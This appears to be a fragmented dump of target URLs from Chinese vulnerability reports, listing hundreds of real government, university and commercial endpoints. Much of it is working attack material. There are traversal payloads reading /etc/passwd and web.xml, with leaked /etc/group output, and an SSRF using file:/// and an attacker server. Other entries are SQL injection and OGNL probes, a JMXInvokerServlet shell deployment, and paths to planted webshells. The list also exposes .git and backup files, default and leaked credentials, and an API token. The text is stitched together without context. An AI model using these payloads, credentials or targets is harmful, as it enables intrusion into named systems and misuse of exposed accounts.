http://med.39.net/cds/ckz/Search.aspx?Keywords=12% http://med.39.net/cds/ckz/Search.aspx?Keywords=12% http://med.39.net/cds/ssk/Search.aspx?Keywords=1% http://med.39.net/cds/ssk/Search.aspx?Keywords=1% http://med.39.net/cds/zyjb/Search.aspx?Keywords=BGU010% http://med.39.net/cds/zyjb/Search.aspx?Keywords=BGU010% http://med.39.net/cds/zybz/Search.aspx?Keywords=1% http://med.39.net/cds/zybz/Search.aspx?Keywords=1% http://med.39.net/cds/jbks/Search.aspx?Keywords=1% http://med.39.net/cds/jbks/Search.aspx?Keywords=1% http://med.39.net/cds/jbzd/Default.aspx http://med.39.net/cds/jbzd/Search.aspx?Keywords=1% http://med.39.net/cds/jbzd/Search.aspx?Keywords=1% http://www.stcsm.gov.cn/的redis服务器:211.144.114.53未授权访问,泄露各类信息 http://www.ahhome.com/admin/login.asp http://tiaokuan.iachina.cn:8090/sinopipi/checklogin/checkLoginInfo.do http://211.144.140.91/sinobrps-query/checklogin/checkLoginInfo.do https://github.com/qiueer/MPort/blob/df8079fed58a7dc327e2668f956d1b9cc854465c/lib/base/mail.py http://203.156.233.236/default.aspx http://www.skybility.com/news/newsdetail.php?id=263 http://mpay.hexun.com/ http://mpay.hexun.com/ http://crm.tongbanjie.com/mobilefeedback http://oa.zotye.com/j_acegi_security_check http://car2sharew.daihing.com/user_api/book_try_drive http://61.153.250.106:8083/manager/html http://61.153.250.106:8080/factory_index.action http://61.153.250.108:8082/manager/html http://61.153.250.108:8083/manager/html console:http://61.153.250.106:88//struts/webconsole.html console:http://61.153.250.106:8083//struts/webconsole.html console:http://61.153.250.106:8080//struts/webconsole.html console:http://61.153.250.106:8082//struts/webconsole.html http://119.254.70.72 https://119.254.70.85 http://passport.liba.com/login.htm http://www.imecare.com/ http://w.imecare.com/ http://125.71.200.138:8081/ http://med.39.net/cds/icd9/Default.aspx http://med.39.net/cds/icd9/Search.aspx?Keywords=12 http://med.39.net/cds/icd9/Search.aspx?Keywords=12 http://www.inspur.com/ http://www.whaac.gov.cn:8080/InteractiveCommunication/ProjectList.aspx?sxname= http://www.rcsp.cn/InteractiveCommunication/ProjectList.aspx?sxname= http://www.wdaac.cn/wsbsdt/InteractiveCommunication/ProjectList.aspx?sxname= http://60.215.8.148:6006/InteractiveCommunication/ProjectList.aspx?sxname= http://222.135.78.34:8086/InteractiveCommunication/ProjectList.aspx?sxname= http://www.rszwfwzx.gov.cn:8080/wbdt/InteractiveCommunication/ProjectList.aspx?sxname= http://www.lgqzwfw.gov.cn/xspww/InteractiveCommunication/ProjectList.aspx?sxname= http://member.iachina.cn/phpMyAdmin http://gk.tjnk.gov.cn/showDirInfos.jsp?levelCode=0208 http://zwgk.tjhd.gov.cn:8000/showDirInfos.jsp?levelCode=02 http://zfxxgk.bh.gov.cn/showDirInfos.jsp?levelCode=02 http://xinxigk.baodi.gov.cn/showDirInfos.jsp?levelCode=0208 http://gk.tjhqqzf.gov.cn/showDirInfos.jsp?levelCode=0208 http://bcm.open.com.cn/login.aspx http://sqlmap.org http://wsfw.lnga.gov.cn/ http://123.157.10.19:8080/factory_index.action http://123.157.10.19:8083/manager/html http://www.rhxwl.com/Server.asp http://www.linhaihome.com/ http://jh.zjmy.net/ http://www.lqmyjj.com/ http://www.sxjhjj.com/ http://www.sxkfqjj.com/ http://www.sxpjgtmyjj.com/ http://www.wlmyjj.com/ http://jh.zjmy.net/ http://www.hyqmyjj.com/ http://www.jjmyjj.com/ http://www.yhmyjj.com/ http://www.ttmyjj.com/ http://www.xjmyjj.com/ http://www.lqmyjj.com http://jh.zjmy.net/ http://jh.zjmy.net/admin_manage/system/mg_editwz.asp?lb=save&id=241 http://jh.zjmy.net/admin_manage/system/mg_editwz.asp http://sqlmap.org http://www.wslh.net/index.php?m=content&c=index&a=lists&catid=2 http://v.wyol.com.cn/t/t1/user/bkplay.aspx?uid=4371&bkspid=740&spid=740 http://v.pxitv.com:88/t/t1/user/bkplay.aspx?uid=38&bkspid=28&spid=28 http://v.zghhzx.com.cn/t/t1/user/bkplay.aspx?uid=117&bkspid=43&spid=43 http://v.sygd.tv/t/t1/user/bkplay.aspx?uid=6&bkspid=54&spid=54 http://v.hcvw.cn/t/t1/user/bkplay.aspx?uid=639&spid=7635&bkspid=3842 http://v.zaoqiangtv.com/t/t1/user/bkplay.aspx?spid=791&bkspid=9&uid=109 http://v.zghhzx.net/t/t1/user/bkplay.aspx?uid=59&bkspid=189&spid=189 http://58.222.151.43/t/t1/user/bkplay.aspx?uid=348&bkspid=356&spid=356 http://v.pudongtv.cn/t/t1/user/bkplay.aspx?uid=1&bkspid=6&spid=6 http://58.210.50.92/t/t1/user/bkplay.aspx?uid=4371&bkspid=1666&spid=1666 http://m.jumei.com/ http://m.staging.jumei.com/ http://m.jumei.com/i/MobileWap/request_delegate?url=../../../../../../../../../../etc/hosts http://m.jumei.com/i/MobileWap/request_delegate?url=../../../../../../../../../../etc/group root:x:0 jumeiops:x:10001 jumeiplat:x:10002 jumeidev:x:10003 jumeidba:x:10004 jumeisec:x:10005 jumeiadmin:x:20000:weibinf,qih1,dongdongf2,mengmengc,hanz,xiw4 jumeiqa:x:10006 zabbix:x:107 nagios:x:108 logs:x:998 http://www.daliyouth.cn/web.zip http://www.bjabia.org/applyExam!apply.do http://duohuo.c.myduohuo.com/global_Cms_contentView_id_399 http://academy.yonyou.com/Px_plan1.aspx?infoid=109 http://academy.yonyou.com/News_1.aspx?newsid=105 http://academy.yonyou.com/open_Courses.aspx?year=2014 http://diy.medlive.cn/?file=diy&action=manage http://www.conjointech.com/server/FCKeditor/editor/filemanager/connectors/test.html http://www.mdjxsb.com/server/FCKeditor/editor/filemanager/connectors/test.html# http://www.mefosun.com/server/FCKeditor/editor/filemanager/connectors/test.html# http://www.chhwujin.com/server/FCKeditor/editor/filemanager/connectors/test.html http://pinggu.lltqc.com/server/FCKeditor/editor/filemanager/connectors/test.html http://www.zhihongcn.com/server/FCKeditor/editor/filemanager/connectors/test.html http://www.fastin.com.cn/server/FCKeditor/editor/filemanager/connectors/test.html http://www.duohuo.net/global_index_search?keywords= http://yidasiyin.com/Easy/Login.aspx http://wr-sz.cn/Easy/Login.aspx http://gxbdsp.com/Easy/Login.aspx http://cyou0755.com/Easy/Login.aspx http://521gx.com/Easy/Login.aspx http://leaders56.com/Easy/Login.aspx www.duohuo.net/global_cms_loadmore http://wenku.baidu.com/link?url=3K55ezvNFBlgLGFAX_4lAmUYcEOUXNqdkweC2KviJnxGNMp8YcrnKufr2_3XJ64NHSPQOfwxF8WBr0LzRqMhIjkgoDxHc0Yzqtx3DFOpBN_ http://i.zhaopin.com/usermaster/UsermasterManage/ChangeEmail?jsoncallback=你好&email=601333824@qq.com http://wx-test.chuchujie.com/index.ph http://dev-0504.wx-dev.chuchujie.com/ http://admin.xjcxedu.com/index.php?app=User&mod=Teacher&act=index&id=1&rand=Math.random%28%29 http://admin.xjcxedu.com/index.php?app=Resource&mod=ResSubject&act=index&selection=zh-CN&source=UGC&p=6150 http://admin.xjcxedu.com/index.php?app=User&mod=Teacher&act=add&node=1 http://stied.whut.edu.cn/getNews.action http://course.sitsh.edu.cn/sx2/loginAction!login.action http://course.sitsh.edu.cn/sx2/one.jsp http://course.sitsh.edu.cn/sx2/cmd.jsp http://itrc.jju.edu.cn/situation_policy/ http://www.wooyun.org/bugs/wooyun-2015-0112177/trace/41eccdef4dbf2da148a875c5af9dfb67 http://222.247.53.197//8001hn_oa/ http://www.muu.com.cn/hd/20131225/christmas_2013_2.html?key=1 www.muu.com.cn www.muu.com.cn www.muu.com.cn http://www.yoncc.com/index.php?c=Index&a=detail&catid=17&id=50 www.yoncc.com www.zjuol.com http://data.ylepb.gov.cn/Upload/ http://wx.chuchujie.com/admin.php http://www.whcits.com/qz2.aspx?id=%B7%A8%B9%FA http://weixin.sunits.com/wx/login!login.do http://caketime.com.cn/Product/Details.aspx?ID=10937&CategoryId=10076%27 http://caketime.com.cn/Product/Details.aspx?ID=10937&CategoryId=10076%27 http://sqlmap.org http://wooyun.org/bugs/wooyun-2015-0114708 http://panpom.com/index.php?action=pro_list_product&cat=19&cid=8&controller=site http://cang.fday.xyz/ http://dingdan.fday.co/ www.ctgpc.com.cn http://www.ctgpc.com.cn/sbgs_new/admin/index.php http://email.ctgpc.com.cn/ http://wooyun.org/bugs/wooyun-2010-092781 https://sa.ctgpc.com.cn/ http://edm.wowsai.com/ url:http://www.hnmgjr.com/wx/gameLogin data:code=137231&money=2700.0&key=【账号】&pwd=【密码】 http://210.76.203.35/status?full=true http://210.76.203.35/invoker/JMXInvokerServlet部署war,getsell http://ppt.edri.sinopec.com/CN/volumn/current.shtml http://ppt.edri.sinopec.com/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../ http://www.job18.net/ http://211.143.251.235:83//Lesktop/Management/DeptEdit.aspx?did=1 http://www.yzjy.net:8864/Lesktop/Management/DeptEdit.aspx?did=1 http://oa.sxtwedu.com/Lesktop/Management/DeptEdit.aspx?did=1 http://oa.xsbhjt.com/Lesktop/Management/DeptEdit.aspx?did=1 http://www.xsbhjt.com//Lesktop/Management/DeptEdit.aspx?did=1 http://www.syjyxy.com:8000//Lesktop/Management/DeptEdit.aspx?did=1 http://dp.job18.net/Lesktop/Management/DeptEdit.aspx?did=1 http://oa.guanghuiqiche.com//Lesktop/Management/DeptEdit.aspx?did=1 http://oa.kllssws.com//Lesktop/Management/DeptEdit.aspx?did=1 http://comoa.umeise.com//Lesktop/Management/DeptEdit.aspx?did=1 http://oasxxkjj03.idc.chujiusoft.net/Lesktop/Management/DeptEdit.aspx?did=1 http://8.86739.com/Lesktop/Management/DeptEdit.aspx?did=1 http://125.65.165.161:86/Lesktop/Management/DeptEdit.aspx?did=1 http://lazyoa.gxahi.com/Lesktop/Management/DeptEdit.aspx?did=1 http://coa.lyta.com.cn/Lesktop/Management/DeptEdit.aspx?did=1 http://jjs.cjlu.edu.cn/ http://jjs.cjlu.edu.cn/Show_detail.php?I=1693 http://m.300.cn/Maps.do?corPname=&method=showFilter http://cwcx.sdju.edu.cn/ http://www.tmtpost.com/.svn/entries http://jx.3wcoffee.com/wp-login.php http://s45.ys.g.baofeng.com/.svn/entries http://www.muzhiwan.com/.svn/entries http://221.199.203.230:9001/dsoa/Personnel/Infomation.aspx?userid=1 http://old.nmgswt.gov.cn/dsoa/Personnel/Infomation.aspx?userid=1 http://xinhuachongming.com.cn/DSOA_TY/Personnel/Infomation.aspx?userid=1 http://oa.xinhuamed.com.cn/DSOA_TY/Personnel/Infomation.aspx?userid=1 http://oa.dream-it.cn/OA/Personnel/Infomation.aspx?userid=1 http://baoxian.gome.com.cn/car/order/view_pa?orderId=1000007704 http://**.**.**/en/login.html http://**.**.**/ http://**.**.**/ http://**.**.**/ http://**.**.**/ http://**.**.**/_ http://**.**.**/ http://**.**.**/log/cacti.log http://**.**.**/manager/ http://jxhd.ciwong.com/ http://117.79.131.140:8000/zh-CN/app/launcher/home http://house.mama.cn/index.php http://61.243.113.13/ http://61.243.113.13/common/userLogin.action http://61.243.113.13/css1.jsp http://221.199.9.205/e/index.jsp http://f.lashou.com/spLogin.php http://wooyun.org/bugs/wooyun-2010-0115492 http://www.nycgs.cn:80/BdMapServlet http://ytncrm.yili.com/find_password_tj.asp http://123.232.119.122:81/DefaultPage1.aspx http://pre-forum.grandcloud.cn/盛大云论坛 http://web.grandcloud.cn/盛大网站云phpv9 http://221.4.168.88/user!index ems.taikang.com/web.tar.gz qryapwd:commonswitch c4:6a:b7:**:**:** c8:97:4c:f7:** c8:97:4c:f7:** c8:97:4c:f7:** c8:97:4c:f7:**CMCC http://upload.baomihua.com//videoupload3.aspx?groupid=1 http://upload.baomihua.com/union_videoupload1.aspx http://www.szdsyy.com/ http://www.pg.com.cn/竟然也在这个服务器上!当时只是传了个一句话上去,看到乌云上关于宝洁的漏洞都忽略了,就暂时没有提交,害怕提交了也被忽略,这就影响大了。 http://www.szcea.org.cn/ http://www.szcea.org.cn/news/detail.asp?id=8362 www.mama.cn/photo/index.php?a=Search&d=index&g=Search&gotosearch=yes&keyword=&num=52&page=3&searchtype=photo http://weixin.mama.cn/session/login http://www.newvane.com.cn/ http://www.wis18.com/ http://www.newvane.com.cn/index.php?ac=article&at=read&did=351 http://edu.cmbc.com.cn/wis18/file.showimage.flow?filename=../WEB-INF/web.xml http://edu.cmbc.com.cn/wis18/file.showimage.flow?filename=../WEB-INF/lib/wis18.jar jdbc:sqlserver://192.168.100.2:1433;databasename=onlineexam http://bqvote.ynet.com/dovote.php?phonenum=*&uname=bjjavmgp http://bqfood.ynet.com/ http://www.good321.net/index.do http://14.17.121.39:81 http://14.17.121.39:81 http://101.227.255.8/ http://211.140.218.166/WebResource.axd?d=1432176493 http://211.140.218.166/ScriptResource.axd http://hhrsks.com/htdocs.rar https://secure.damai.cn/ http://secure1.damai.cn/ http://admin.ucsp.xbeizi.com/login http://www.uqee.com/public/login http://www.wecook.cn/.git/config http://cai.wecook.cn/.git/config http://u1.wecook.cn/.git/config http://223.223.181.117 http://113.98.240.231/ http://www.infojiading.cn/ http://jy.shutcm.edu.cn/index.asp http://jiuye.lixin.edu.cn/index.asp http://job.shmtu.edu.cn/index.asp http://jiuye.sbs.edu.cn/index.asp http://job.shupl.edu.cn/index.asp http://jy.sthu.edu.cn/index.asp http://job.shjgu.edu.cn/index.asp http://jytd.lidapoly.edu.cn/job/index.asp http://job.sicfl.edu.cn/ http://job.smic.edu.cn/index.asp http://www.infojiading.cn/sppcweb/index.asp http://hd.mama.cn/gz/calendar/log/?month=5&year=2015-0 user:tangyanfei pass:tyf123456 user:xuya pass:123456a http://hd.mama.cn/admin/activity/checklist/?check=u http://**.**.**/nms/login.action http://user.kdnet.net/register_reset_password.asp www.fotomore.com/news/detail.php?aid=703 http://jiehun.55bbs.com/ http://dealer.55bbs.com/ http://i.boqii.com http://www.jianjie.cc/Account/FlightOrderDetail.aspx?orderop=HYQ2DSC83VZJRXEGCL85XEZ93U76GPGL7Y8HJLXMS2N4926N4WGEY3BMF7VFQQ47WT6CM7J4VCCUE http://his.tv.sohu.com/his/get.do?&c=1&callback=%3Cscript%3E&passport=&encode=UTF-8&pagesize=20&page=1&videotype=2&htype=1&uid=257764876&_=1432546951082 http://zb.zotye.com:8083/user_index.do http://www.1mutian.com:80/ www.1mutian.com http://221.199.203.230:9001/dsoa/modules/pdflist.aspx?info_id=1 http://old.nmgswt.gov.cn/dsoa/modules/pdflist.aspx?info_id=1 http://xinhuachongming.com.cn/DSOA_TY/modules/pdflist.aspx?info_id=1 http://oa.xinhuamed.com.cn/DSOA_TY/modules/pdflist.aspx?info_id=1 http://oa.dream-it.cn/OA/modules/pdflist.aspx?info_id=1 http://wap.renrentou.com/friendgodeuser/success?dns=534230 http://wap.renrentou.com/friendgodeuser/success?dns=534229 www.10655123.com http://admin.10655123.com/ http://admin.10655123.com/common/left.jsp http://www.10655123.com/images/.svn/entries http://admin.10655123.com/client/.svn/entries http://admin.10655123.com/mngr/privilege/getPrivilegeListByGroupId.action?operGroupLevel=0 http://admin.10655123.com/mngr/user/deleteUser.jsp http://my.shushi100.com/popajax/changecity.aspx?action=xiamen|%CF%C3%C3%C5&r=0.9740669283330295 http://my.shushi100.com/ashx/changecity.ashx?cityename=xiamen&r=0.5061514708509435&callback=jsonp1432482839856&_=1432482889068 http://dj.17m3.com/game.aspx?sercon=* http://dj.17m3.com/game.aspx?sercon=% edm.mail.m3guocdn.com/bbb.aspx http://61.50.251.130:80/manager/html http://112.125.92.1:27017/ http://124.238.218.78/ http://124.238.218.78 http://111.26.194.37:80/manager/html http://www.jlsysp.org.cn/ShenPing/view.do?method=zhu http://111.26.194.37/BuLiang/users.do;jsessionid=917D738EAEBEF1992D8A27D1565084DE?method=login http://111.26.194.37/QiXie/view.do?method=zhu http://www.hecard.com.cn/manager/html url:http://124.128.69.182:80/manager/html user:admin pass:admin http://bbs.web.teeqee.com/config.inc.php~ http://aqe.wyn88.com/Quickas/login http://58.18.172.19:8686/index.php?retid=99925562c93262a8b&unautologin=1 cn:9060/ https://www.juxinli.com/down_load?args=../../../../../../../../../../etc/passwd http://miao.stnts.com/sec/Cafe/ApplyList http://59.56.62.170:81/ http://59.56.62.170:81/login.aspx存在注入漏洞,脱掉你们的裤子,呵呵 http://x.dwb.so//query.php?n= http://www.juooo.com/myjuooo/address/?address_id=XXXXXX http://www.juooo.com/myjuooo/write http://www.juooo.com/myjuooo/note http://www.juooo.com/myjuooo/note http://www.juooo.com/myjuooo/view/370000/ http://oa.lefucn.com http://plc.fa.omron.com.cn/log/show.action?ip=&oper=&dateFrom=&dateTo= http://219.159.69.133:81/ME/LOGIN.ASPX http://219.159.69.133//admin/login.aspx http://eng.okmart.com.tw/ENG_WebSite/SHARE/NOTICE_BOARD.aspx?NOTICE_NO=201404014 https://ecp.fareastone.com.tw/ECP/customer/custAccountApply_Frame.action www.yizijia.cn http://**.**.**/UploadPhoto/5eace63a-60ee-41c1-ab45-e918e24b7699.php http://www.lefucn.com/index.php?r=home/public/Webaffiche&id=13 http://employee.okmart.com.tw/okweb/bulletin4/bulletin4_edit.asp?BulNO=77588&Source=Y http://rkjj.ahpfpc.gov.cn/UpLoadFile/ASPXSpy.txt http://rkjj.ahpfpc.gov.cn/UpLoadFile/xx.aspx http://www.ahnjsw.gov.cn/uploadfile/xx.aspx http://ldrk.ahpfpc.gov.cn/uploadfile/xx.aspx http://rkjj.ahpfpc.gov.cn/UpLoadFile/xx.aspx http://jlfz.ahpfpc.gov.cn/UpLoadFile/xx.aspx http://www.fdxjsw.gov.cn/uploadfile/xx.aspx http://www.czsjsw.gov.cn/uploadfile/xx.aspx http://www.tljsw.gov.cn/uploadfile/xx.aspx http://www.tljsw.gov.cn/uploadfile/xx.aspx http://113.240.245.42:8081/A430121chss/chss.html http://union.lashou.com http://union.lashou.com/index.php?r=tui/tui/goods http://survey.kmu.edu.tw/QS00/alulmniIndex.action http://123.127.94.135:81/rtyh3/login.jsp http://www.jxvw.com/ http://xgxb.shuzibao.com/xgxb/manage/dbbak.asp http://szb.shmg.org.cn/manage/dbbak.asp http://www.sxgjdl.com:8181//manage/dbbak.asp http://www.zfc.edu.cn/dzb/manage/dbbak.asp http://xiaobao.gdqy.edu.cn/manage/dbbak.asp http://www.cnmo.com/docVote.php http://114.251.7.140:85/rtyhmap/login.jsp http://114.251.7.140:85/rtyhmap/pda/pic/%7B20150526-0804-0832-0000-7641C1A66CB8%7D.jsp http://114.251.7.140:85/rtyhmap/pda/pic/%7B20150526-0826-5867-0001-ACB33EC72DD5%7D.jsp http://nsp.lashou.com/ GoogleHack:inurl:/Content/PlatContentNew http://cloud.ncedu.gov.cn http://www.361school.com http://202.103.215.61 http://61.190.174.10:8002 http://xyygsy.com.cn http://fx.ssdfx.sd.cn http://***/PlatFormN/PlatformResouseN/SearchOuterIndexList.aspx?a=b http://***/PlatFormN/PlatformResouseN/SearchOuterIndexList.aspx?a=b URL:http://calendar.hexun.com/client/FData/Default.aspx?keydata=1&page=1 POST:http://calendar.hexun.com/client/FData/ http://my.tv.sohu.com/user/profile/basic_update.do http://www.infosea.com.cn/yonghu.html http://61.187.55.41:8090/opac/dzxxxs.jsp?dztm=00007&index=3 http://58.30.20.36:8089/opac/dzxxxs.jsp?dztm=00007&index=3 http://125.223.252.12:8089/opac/dzxxxs.jsp?dztm=00007&index=3 http://59.51.114.198:8088/opac/dzxxxs.jsp?dztm=00007&index=3 http://60.171.185.69:8089/opac/dzxxxs.jsp?dztm=00007&index=3 http://58.132.57.4:8070/opac/dzxxxs.jsp?dztm=00007&index=3 http://124.207.106.138:8070/opac/dzxxxs.jsp?dztm=00007&index=3 http://111.207.101.74:8070/opac/dzxxxs.jsp?dztm=00007&index=3 http://www.sxsmyxx.cn/tsims/NewsList.asp?T_Name=xxxx&lx=99 http://192.168.3.32:809/img_cell/ http://192.168.3.32:809/img/ http://202.204.172.166 https://portal.haier.com/ http://www.suse.edu.cn/ http://221.2.39.157:81/ http://cvs.hexun.com/zhaopin/ http://www.tlghj.gov.cn/Data/view.aspx?id=649 http://sqlmap.org http://wooyun.org/bugs/wooyun-2010-085980 http://210.28.144.20:206/opac/ http://opac.yzu.edu.cn:8080/opac/ http://opac.lib.sdu.edu.cn/opac/ http://lib2.nuist.edu.cn/opac/ http://lib.shisu.edu.cn:8080/opac/ http://202.205.213.113:8080/opac/ http://211.87.113.2:8080/opac/ http://manage.gc.17173.com/cloud/home/Frame.wa游戏学院后台管理系统 http://wooyun.org/bugs/wooyun-2010-062518 http://www.gxhzedu.net/fsmcms http://www.hzfgw.gov.cn/fsmcms/ http://www.gxhzjw.gov.cn/fsmcms/ http://www.cnfia.cn/fsmcms/ http://www.btgaj.gov.cn/fsmcms/ http://i.sohu.com/profile/home/swfUploadIcon.htm(修改资料上传头像) http://sucimg.itc.cn/avatarimg/s_247083258_1432619329154_c175 http://www.shaoyang.gov.cn/help.aspx https://inquiry.gham.cn:443/funds-struts/fund-net-chart-table/?&redirect:xxx${13579246-1 http://www.whcits.com/xieyou.aspx http://117.40.193.113:8080/ www.hrbd***** http://www.17y.com http://www.17y.com/sds/fame http://api.360iii.net:8888/iengine360API/stock/stockAction.action www.360iii.com,record.360iii.com,m.360iii.com等 http://registration.360iii.net:8080/phoneService/news/news_getNews.action http://61.144.227.35/main/gb/adminhall/result1.jsp http://cwc.hnust.cn/cwcxv4/sf40/Axhfind.asp http://portal.hnust.edu.cn http://stu.hnust.edu.cn/xg/application/main.jsp http://wenku.baidu.com/view/714197dc804d2b160b4ec0e9.html http://line.yizijia.cn/yuding/success?order=256613 http://www.hh168.gov.cn:8080/vip1/userlogin.action https://123.125.17.30/ http://v.boqii.com/ http://v.boqii.com/ http://v.boqii.com//vetapi.php?UDID=123&url=file:///etc/passwd http://v.boqii.com//vetapi.php?UDID=123&url=http://www.baidu.com/index.php http://v.boqii.com//vetapi.php?UDID=123&url=http://我的服务器ip/1.txt http://v.boqii.com/.htaccess http://m.boqii.com/.htaccess http://218.60.146.58/News/3.asp http://www.10jqka.com.cn:80/ www.10jqka.com.cn http://123.125.123.24/views/login.html http://123.125.123.130/views/login.html http://zchq.cuc.edu.cn/Account/Login http://www.zzfdc.gov.cn:80/news/listAction.do?act=wyglLeft&pageType=wygl&boardName=%E5%8A%9E%E4%BA%8B%E6%8C%87%E5%8D%97&boardId=-999 http://m.12308.com/m.zip http://www.sf-bbs.com/ http://www.sf-bbs.com/config/.config_ucenter.php.swp http://www.chdc.com.cn/ http://www.chdz.com.cn/) http://123.233.247.75/wjj_site/ldaplogin/login_login.action存在命令执行漏洞 http://123.233.247.75/wjj_site/2.jsp密码tom http://bsp-test.sf-express.com:8088/ http://estore.wacom.com.cn/这个是wacom的分站,存在XSS的地方在订单的收货地址那里,插入: http://t.cn/R2yDCcv http://cx.njnu.edu.cn/sjjx/shownews.aspx?newsno=210 http://cx.njnu.edu.cn/sjjx/MoreNews.aspx?NewsType=FB0FDFF07B50C0AB http://rsc.njnu.edu.cn/XmlService/search.aspx?gntype=120&parvalue=LeafType=0&pagesize=10000&page=-1 http://jcfw.njnu.edu.cn/links.asp?typeID=26 http://jcfw.njnu.edu.cn/sources_list_1.asp?kcmc= http://jcfw.njnu.edu.cn/news_view.asp?newsID=1211 http://jcfw.njnu.edu.cn/books_list_1.asp?smmc= http://jcfw.njnu.edu.cn/sources_list_2.asp?dwmc= http://jcfw.njnu.edu.cn/teachers_list_1.asp?jsmc= http://jcfw.njnu.edu.cn/aspects_list_1.asp?zymc= http://gfs.njnu.edu.cn/default.php?mod=article&fid=4 http://gfs.njnu.edu.cn/default.php?mod=article&settype=0&fid=1 http://rsc.njnu.edu.cn/xmlService/search.aspx?page=&pagesize=&gntype=205&parvalue= http://lab.njnu.edu.cn/xinli/MoreNews.aspx?NewsType=-3 http://lab.njnu.edu.cn/xinli/ShowNews.aspx?NewsType=-1&NewsNo=885 http://lab.njnu.edu.cn/xinli/Common.aspx?TypeSuoShu=ShiYanJiaoXue&NewsType=104 http://lab.njnu.edu.cn/xinli/ShowNews.aspx?NewsNo=573&NewsType=-901 http://kc.njnu.edu.cn/xlzx/Document.aspx?CategoryID=1&id=1 http://kc.njnu.edu.cn/xlzx/Document.aspx?CategoryID=5&DocumentID=172&ID=172 https://61.177.62.254 http://www.fywealth.cn/ http://www.infosea.com.cn/yonghu.html http://61.187.55.41:8090/opac/qkdh_zm.jsp?flh=L http://58.30.20.36:8089/opac/qkdh_zm.jsp?flh=B http://211.86.195.15:8086/opac/qkdh_zm.jsp?flh=B http://125.223.252.12:8089/opac/qkdh_zm.jsp?flh=P http://59.51.114.198:8088/opac/qkdh_zm.jsp?flh=P http://210.46.140.21:8080/opac/qkdh_zm.jsp?flh=P http://60.171.185.69:8089/opac/qkdh_zm.jsp?flh=S http://218.75.208.250:8089/opac/qkdh_zm.jsp?flh=M http://202.192.67.29/QuestionList.aspx http://125.218.212.175:10001/QuestionList.aspx http://210.38.57.36:8086/hudong/QuestionList.aspx http://kjxyl.gdufs.edu.cn/hudong/QuestionList.aspx http://219.222.244.59:6006/QuestionList.aspx http://202.192.67.29/TopicList.aspx http://125.218.212.175:10001/TopicList.aspx http://210.38.57.36:8086/hudong/TopicList.aspx http://kjxyl.gdufs.edu.cn/hudong/TopicList.aspx http://219.222.244.59:6006/TopicList.aspx www.dwb.so http://kf.07073.com/company/manage厂商自助后台登陆处无验证码,可爆破。 http://m.120ask.com/kuaiwen/tongbingxianglian/chatroom?gid=10055&sex=2 http://user.iyiyun.com/ www.ta-police.com/so.aspxkey=1,在搜索后构造[%& www.letvcloud.com www.letvcloud.com ftp://admin:admin@www.cni22.com.cn http://hs.whrt.gov.cn/safemanager/login.do http://hs.whrt.gov.cn/safemanager/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector http://api.mingdao.com/post/v2/img.aspx?access_token=2a691ac8247447baa90223b9374168b4&pagesize=10&post_type=0&filter_type=0&format=json http://scxy.nmjt.gov.cn/jssc/Public.aspx?page=DataQuery/QueryConstructInfo.aspx?type= http://m555.cn/i.asp?id=F8BA43EE-41BB-4694-8E58-9AB50C1104F7 http://180.166.6.78/ https://180.166.6.78/ https://180.166.6.81/ http://www.100eshu.com/Member/MyAccount/myOrder.aspx http://w8.wjxit.com/view.asp?cid=550&id=749 http://w8.wjxit.com/manage/ username:admin password:admin001 www.fishzj.com www.gdzfy.com www.intjk.com www.xsfcw.com www.gd-caxin-gwzy.com www.gd-caxin-zxrj.com www.zwgnh.com www.seone.net http://www.yqjqnxs.com:8888/accountclient/manager/checkstream.action http://pushmail.wo.com.cn/mail/login.action?user= font-weight:normal font-weight:normal http://wooyun.org/bugs/wooyun-2010-082959 http://122.144.134.79/general/score/flow/scoredate/result.php?FLOW_ID=11 http://www.ccas.com.cn:8008/general/score/flow/scoredate/result.php?FLOW_ID=11 http://219.139.134.9:70/general/score/flow/scoredate/result.php?FLOW_ID=11 http://www.esyf.net:8000/general/score/flow/scoredate/result.php?FLOW_ID=11 http://61.153.216.116:85/general/score/flow/scoredate/result.php?FLOW_ID=11 http://idula.com/general/score/flow/scoredate/result.php?FLOW_ID=11 http://train.guosen.com.cn:8080/customize/nwc_755_newvlive/login/login.html http://124.127.187.6/qcar/ http://124.127.187.6/qcar/checkUser.do http://124.127.187.6/qcar/checkUser.do http://wooyun.org/bugs/wooyun-2010-019206 http://demo.kuaidiantong.cn/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=2 http://dj.gzdisc.cn/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3 http://www.xxsp.me/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3 http://www.eme.com.cn/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3 http://xn--ehqsq872berelo3bbjl.xn--fiqs8s/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3 http://irentbooks.cn/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3 http://mp.sohu.com/web/personal/get http://sucimg.itc.cn/avatarimg/b9242b2cbe19450a9347accbc8dcc639_1432645407636 http://pinge.focus.cn/a/edituserinfo http://121.33.74.72/ http://dms.39.net/login.aspx http://www.hishop.com.cn/ inurl:SubCategory.aspx?keywords+minSalePrice http://127.0.0.1/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2%27&brand=27 http://spt.0351tao.cn/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.emmelle.cn/shop//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.nnjt365.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.oxie.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://yuntoys.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.qhjddl.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.gzkorea.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://feihongzhixin.mall.hjhl.cn/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 